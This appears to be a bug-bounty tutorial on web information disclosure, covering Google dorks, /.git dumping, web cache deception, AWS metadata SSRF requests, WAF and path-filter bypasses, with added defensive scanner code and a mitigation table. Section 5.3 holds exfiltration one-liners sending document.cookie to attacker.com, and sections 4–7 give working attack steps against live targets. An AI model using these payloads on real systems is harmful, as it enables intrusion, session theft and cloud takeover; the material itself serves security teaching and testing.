June 13, 2026
Essential Guide to Information Disclosure
Master information disclosure vulnerabilities: identify attack vectors, exploit leaks, and mitigate web security risks.
JPablo13
6 min read
1. What is Information Disclosure?
Information disclosure (Information Leakage) occurs when a web application unintentionally exposes sensitive data to unauthorized users. Its danger lies in acting as an amplifier, converting seemingly innocuous information into the entry point for critical attack chains.
|Data Type     |Exposure Example                                                    |
|--------------|--------------------------------------------------------------------|
|Credentials   |API keys in .git, HTML comments, environment variables in JS bundles|
|Infrastructure|Framework version in X-Powered-By headers, full stack traces        |
|User Data     |Web Cache Deception exposing PII, IDOR in /api/users/{id}           |
|Source Code   |Public /.git/, .DS_Store, vim .swp files, .bak backups              |
|Cloud Secrets |AWS keys in JS, GCP service accounts in repos, unexpired JWT tokens |
|Business Logic|Error messages revealing internal validation rules or SQL queries.  |
2. Impact: Where can this vulnerability lead?
The impact varies from Low to Critical. In Bug Bounty, the key is to demonstrate the chained impact, not the isolated leak.
|Severity|Impact Scenario                                                    |
|--------|-------------------------------------------------------------------|
|Critical|AWS/GCP keys leakage → full access to cloud infrastructure.        |
|Critical|Source code in /.git → logic analysis → authentication bypass.     |
|High    |Stack trace with internal paths → Path Traversal → LFI.            |
|High    |Web Cache Deception → PII exposure of multiple authenticated users.|
|Medium  |Outdated software version with a known public CVE.                 |
|Medium  |Session tokens in URLs → theft via Referer header.                 |
|Low     |X-Powered-By with an updated version (no exploitable CVE).         |
3. Reconnaissance Methodology
3.1 Passive Footprints and Historical OSINT (Vital)
Developers often delete sensitive files (.env, .bak), but search engines and historical repositories keep them.
Google Dorks:
site:target.com ext:log | ext:bak | ext:sql | ext:env | ext:config
site:target.com "stack trace" | "sql syntax" | "Warning:" | "Fatal error"
"target.com" "Authorization: Bearer" site:github.com
Historical Analysis (Wayback Machine):
echo "target.com" | waybackurls | grep -iE "\.env|\.git|\.bak|\.sql|api_key"
echo "target.com" | gau --subs | grep -i "\.js$"
3.2 Active Signals
|Signal Detected                    |Probable Vulnerability                             |
|-----------------------------------|---------------------------------------------------|
|X-Powered-By: PHP/7.2 header       |Search for CVEs for that specific version.         |
|200 vs 302 response based on user  |Valid user enumeration.                            |
|Time difference (~500ms)           |Blind SQLi or enumeration.                         |
|/.git/ returns 200 or 403          |Git repository exposure → download with git-dumper.|
|Stack trace in JSON body           |Framework, internal paths, exposed SQL queries.    |
|Cache hit on routes with extensions|Web Cache Deception (e.g. /profile/me.css).        |
3.3 Tools and Automation
Fuzzing sensitive files and APIs:
ffuf -u https://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -mc 200,301,403
JavaScript Analysis (Secrets and Endpoints):
subjs -i target.txt | xargs -I{} python3 LinkFinder.py -i {} -o cli
truffleHog --regex --entropy=True --json https://target.com
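The --regex and --entropy flags above describe the two detection strategies secret scanners combine: known-format patterns for keys with a recognizable prefix, and Shannon entropy for random-looking strings that have none. The scanner below is an added example (my code, not truffleHog's and not from the original post) that runs both over a constructed JavaScript bundle; the 4.0 bits/char threshold, the 20-character minimum and the string-literal pattern are assumptions to tune against your own false-positive rate.

```python
import math
import re

# Known-format secret patterns. The AWS access-key prefix and the JWT
# three-segment base64url shape are documented formats; the rest is assumed.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "jwt": re.compile(r"\beyJ[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}\b"),
    "bearer_header": re.compile(r"Authorization:\s*Bearer\s+\S+", re.IGNORECASE),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
}

# Entropy rule for secrets without a recognizable prefix: a quoted string of
# 20+ base64-ish characters with >= 4.0 bits/char of Shannon entropy.
STRING_LITERAL = re.compile(r"""["']([A-Za-z0-9+/=_\-]{20,})["']""")
ENTROPY_THRESHOLD = 4.0


def shannon_entropy(s):
    """Bits per character over the string's own symbol frequencies."""
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def redact(value):
    """Keep just enough of the value to locate it, never the whole secret."""
    return value[:4] + "..." + value[-4:] if len(value) > 12 else "***"


def scan_line(line):
    hits = [(name, m.group(0)) for name, rx in PATTERNS.items() for m in rx.finditer(line)]
    for m in STRING_LITERAL.finditer(line):
        value = m.group(1)
        already = any(value in found for _, found in hits)   # don't double-report a pattern hit
        if not already and shannon_entropy(value) >= ENTROPY_THRESHOLD:
            hits.append(("high_entropy", value))
    return hits


def scan(text):
    """Return (line number, finding type, redacted value) for every hit."""
    return [
        (lineno, kind, redact(value))
        for lineno, line in enumerate(text.splitlines(), 1)
        for kind, value in scan_line(line)
    ]


# Constructed bundle. Lines 2 and 3 are the example key pair from the AWS
# documentation (not a live credential); line 5 is a made-up JWT whose
# signature segment is a placeholder. Line 4 is a long but low-entropy
# literal that the entropy rule must not flag.
SAMPLE_BUNDLE = """\
const API_BASE = "https://api.example.com/v2";
const awsKey = "AKIAIOSFODNN7EXAMPLE";
const awsSecret = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY";
const theme = "dark-mode-enabled-by-default";
// staging token: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhZG1pbiJ9.c2lnbmF0dXJlX3BsYWNlaG9sZGVy
fetch(API_BASE, { headers: { Authorization: "Bearer " + token } });
"""

if __name__ == "__main__":
    for lineno, kind, value in scan(SAMPLE_BUNDLE):
        print(f"line {lineno}: {kind} {value}")
```

Wired into CI as a pre-merge check on built bundles (not just source), this catches the "API keys in JS bundles" row of the first table before the bundle is ever served.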
4. Exploitation Methodologies
4.1 Exploiting Exposed /.git
- Verify access:
curl -s https://target.com/.git/HEAD
(must return a ref)
- Download repository:
git-dumper https://target.com/.git/ ./repo
- Search for secrets across history:
git grep -i 'password\|secret\|key\|token' $(git rev-list --all)
4.2 Verbose Stack Traces and Error Messages
Techniques to trigger informative errors:
- Unexpected types (PHP):
param=Array%5B%5D%3D1
- Null byte (C/Old PHP):
param=%00
- NoSQL probe:
param={"$gt": ""}
- Header manipulation:
Accept: application/vnd.api+json
4.3 Web Cache Deception (PII Exposure)
Deceive the CDN/Cache into storing an authenticated user's private information by serving it on a static route.
- Navigate authenticated to:
https://target.com/api/profile/me.json
- Mutate the URL to simulate a static file:
https://target.com/api/profile/me.json/nonexistent.css
- If the response contains your data and the X-Cache: HIT header, you can send that URL to a victim so their PII is cached, and then you read it.
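The deception works only because the cache decides by URL extension while the origin decides by route. The mitigation row in section 9 (cache on Content-Type, not solely on extension) is shown below as an added example, not from the original post: the extension-only rule next to a hardened rule that requires the served Content-Type to agree with the extension and refuses anything the origin marks private or that sets a cookie. The request URLs and response headers are constructed.

```python
import os
from urllib.parse import urlsplit

# Extension -> Content-Type values a genuinely static asset would be served with.
EXT_TO_TYPES = {
    ".css": {"text/css"},
    ".js": {"application/javascript", "text/javascript"},
    ".png": {"image/png"},
    ".jpg": {"image/jpeg"},
    ".svg": {"image/svg+xml"},
    ".woff2": {"font/woff2"},
}


def naive_cache_decision(url):
    """Extension-only rule: the one Web Cache Deception relies on."""
    ext = os.path.splitext(urlsplit(url).path)[1].lower()
    return ext in EXT_TO_TYPES


def hardened_cache_decision(url, response_headers):
    """Cache only when the origin's response proves the asset is static.

    The extension still selects the rule, but the served Content-Type must
    agree with it, and responses the origin marks private/no-store or that
    set cookies are never stored.
    """
    hdrs = {k.lower(): v for k, v in response_headers.items()}
    ext = os.path.splitext(urlsplit(url).path)[1].lower()
    if ext not in EXT_TO_TYPES:
        return False
    content_type = hdrs.get("content-type", "").split(";")[0].strip().lower()
    if content_type not in EXT_TO_TYPES[ext]:
        return False   # /api/profile/me.json/x.css answered as application/json
    cache_control = hdrs.get("cache-control", "").lower()
    if "private" in cache_control or "no-store" in cache_control:
        return False
    if "set-cookie" in hdrs:
        return False
    return True


# Constructed inputs: the deception URL from above as the origin answers it
# (path tail ignored, profile JSON returned without Cache-Control), and a
# genuine stylesheet.
DECEPTION_URL = "https://target.com/api/profile/me.json/nonexistent.css"
PROFILE_RESPONSE = {"Content-Type": "application/json; charset=utf-8"}
ASSET_URL = "https://target.com/static/app.css"
CSS_RESPONSE = {"Content-Type": "text/css", "Cache-Control": "public, max-age=86400"}

if __name__ == "__main__":
    print("naive caches deception URL:   ", naive_cache_decision(DECEPTION_URL))
    print("hardened caches deception URL:", hardened_cache_decision(DECEPTION_URL, PROFILE_RESPONSE))
    print("hardened caches real CSS:     ", hardened_cache_decision(ASSET_URL, CSS_RESPONSE))
```

The second line of defence belongs at the origin: a profile endpoint should reject a path with an unexpected tail instead of serving the profile for it, and should send Cache-Control: no-store on every authenticated response so that even a misconfigured cache has nothing to keep.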
4.4 Cloud Metadata and Environment Variables
AWS Instance Metadata (IMDSv2 Bypass): Modern environments block IMDSv1. You need to generate a token first if you have an SSRF that allows header injection.
# Step 1: Obtain token (if SSRF allows PUT and headers)
PUT /latest/api/token HTTP/1.1
X-aws-ec2-metadata-token-ttl-seconds: 21600
# Step 2: Use the token
GET /latest/meta-data/iam/security-credentials/ HTTP/1.1
X-aws-ec2-metadata-token: <TOKEN>
Common Debug Endpoints:
- Spring Boot:
GET /actuator/env or GET /actuator/heapdump
- Django:
GET /__debug__/
4.5 GraphQL Introspection
If GraphQL is exposed, try dumping the entire schema to discover hidden mutations or administrative fields.
{"query": "query IntrospectionQuery { __schema { queryType { name } } }"}
5. Bypassing WAFs and Modern Defenses
Most WAFs detect signature-based patterns. The modern strategy is evasion through behavior, not just syntactically altering payloads.
5.1 Behavior-Based Mutation and Evasion
- Header Spoofing for Rate Limit:
X-Forwarded-For: 10.0.0.{1..255}
- Chunked Transfer Encoding: Fragment the payload to evade WAF inspection.
Transfer-Encoding: chunked
1
/
4
.git
7
/config
0
5.2 File Access Restriction Bypass
|Technique          |Example                              |
|-------------------|-------------------------------------|
|Case variation     |/.Git/, /.GIT/, /.git/               |
|URL encoding       |/%2e%67%69%74/                       |
|Double URL encoding|/%252e%2567%2569%2574/               |
|Path normalization |/./././.git/                         |
|Trailing null byte |/.git%00                             |
|Trailing dot       |/.git./                              |
|Direct file access |/.git/index, /.git/COMMIT_EDITMSG    |
|HTTP method switch |POST /.git/config vs GET /.git/config|
5.3 CSP Bypass for Data Exfiltration
// If CSP allows public CDNs with 'unsafe-inline'
<script src='https://cdn.jsdelivr.net/npm/attacker-package'></script>
// JSONP endpoints to exfiltrate cross-origin
https://target.com/api/user?callback=fetch('https://attacker.com/?d='+document.cookie)
// DNS exfiltration when HTTP is blocked
fetch('https://'+btoa(document.cookie)+'.attacker.com')
6. Business Impact: How to Sell the Risk
|Leak Type                    |Business Impact Argument                                                                                                                            |
|-----------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------|
|Credentials / API Keys       |Unauthorized access to internal systems. Remediation costs for compromised cloud infrastructure. GDPR/CCPA: fine risk of up to 4% of annual revenue.|
|Exposed Source Code          |Exposed intellectual property. Enables vulnerability analysis in business logic and accelerates specific 0-day attacks against the platform.        |
|User Data                    |Direct privacy violation. In financial/health platforms: PCI-DSS / HIPAA regulatory risk. Affects reputation and customer trust.                    |
|Stack traces / internal paths|Precise fingerprinting → reduces attack time from weeks to hours. Acts as a "map" for external attackers.                                           |
|User Enumeration             |Allows targeted Credential Stuffing. In financial platforms: direct fraud. Violates privacy by confirming account existence.                         |
|Active GraphQL Introspection |Full exposure of the internal data model. Allows enumerating undocumented fields and accessing hidden privileged data.                              |
7. Proof of Concept: Recommended Structure
7.1 PoC for Exposed /.git
# Step 1 - Verify exposure
curl -s https://target.com/.git/HEAD
# Expected response: ref: refs/heads/main
# Step 2 - Download and analyze repository
git-dumper https://target.com/.git/ /tmp/repo
cd /tmp/repo && git log --oneline | head -20
# Step 3 - Demonstrate impact (obtain a real credential)
git grep -i 'DB_PASSWORD\|API_KEY\|SECRET' $(git rev-list --all)
# Step 4 - Demonstrate access to a real system with that credential
# (include a screenshot with the redacted value *****)
8. Chaining Strategy (Vulnerability Chaining)
Information Disclosure is rarely the end goal. Its real value is being the first link in a chain that scales to critical impact.
|Info Disclosure (Trigger)     |Chained With:            |Final Impact                           |
|------------------------------|-------------------------|---------------------------------------|
|API key in JS bundle          |Hidden internal API calls|Unauthorized access to corporate data. |
|/.env with DB credentials     |Remote DB connection     |Full Data Breach + possible RCE.       |
|Anomalous cached response     |Web Cache Deception      |Mass theft of session tokens or PII.   |
|Stack trace with internal path|Path Traversal / LFI     |Reading /etc/passwd or code execution. |
|Active GraphQL introspection  |Hidden mutations         |Privilege escalation (e.g. updateRole).|
|Partial SSRF + cloud metadata |AWS IMDSv2 keys          |Full cloud infrastructure takeover.    |
9. Vulnerability Mitigation
|Vector               |Recommended Mitigation                                                                                                      |
|---------------------|----------------------------------------------------------------------------------------------------------------------------|
|/.git/ / Backups     |Deny access via reverse proxy rules (nginx/apache). Never serve the repository from the webroot.                             |
|Stack traces         |Disable display_errors in production. Implement a generic error handler.                                                    |
|Secrets in code      |Implement SAST scanning tools (TruffleHog, Gitleaks) in CI/CD pipelines. Use AWS Secrets Manager or HashiCorp Vault.        |
|Web Cache Deception  |Configure the CDN to cache based on Content-Type and not solely on the URL extension.                                       |
|GraphQL introspection|Disable introspection in production environments. Implement query depth validation (Depth Limiting).                       |
|Cloud Metadata       |Require IMDSv2 in AWS (forbidding tokenless calls). Block access to 169.254.169.254 from containers not requiring IAM roles.|
10. Supplementary Tables
10.1 Sensitive Files
|File / Path                           |Exposed Information                                    |
|--------------------------------------|-------------------------------------------------------|
|/.git/config                          |Remote URL with embedded credentials                   |
|/.env / /.env.local / /.env.production|All environment variables: DB, API keys                |
|/phpinfo.php                          |Complete PHP configuration, server variables           |
|/actuator/env                         |Spring Boot: complete configuration properties         |
|/actuator/heapdump                    |Spring Boot: JVM heap dump → credentials in memory     |
|/.DS_Store                            |Mac file index → directory file list                   |
|/WEB-INF/web.xml                      |Java EE: servlet configuration and mappings            |
|/server-status                        |Apache: active processes, internal IPs, processing URLs|
|/api/swagger.json / /openapi.yaml     |All API endpoints and parameters                       |
|/graphql (introspection)              |Complete schema: types, queries, mutations             |
|/__webpack_hmr                        |Webpack HMR active in production                       |
|/trace                                |Spring: full trace of the last request                 |
|/.well-known/openid-configuration     |OIDC discovery → internal auth endpoints               |
10.2 Relevant HTTP Headers
|Header            |Leaked Information                            |
|------------------|----------------------------------------------|
|X-Powered-By      |Language/framework and version                |
|Server            |Web server and version (nginx/1.14.0)         |
|X-AspNet-Version  |Exact ASP.NET version                         |
|X-Debug-Token     |Symfony: Profiler enabled in production       |
|X-Runtime         |Rails: processing time (timing oracle)        |
|Via               |Internal proxies in the network path          |
|X-Forwarded-Server|Backend server hostname                       |
|X-Cache           |CDN/proxy caching info → internal architecture|
|CF-Ray            |Cloudflare Ray ID → confirms CDN usage        |
10.3 Verifiable Cloud-Native / Kubernetes Endpoints
/api/v1/namespaces                 # Open K8s API → full cluster access
/metrics                           # Public Prometheus endpoint → infrastructure data
/.well-known/openid-configuration  # OIDC discovery
/healthz / /readyz                 # May expose info about internal components
/debug/pprof                       # Go: active HTTP profiling handler in production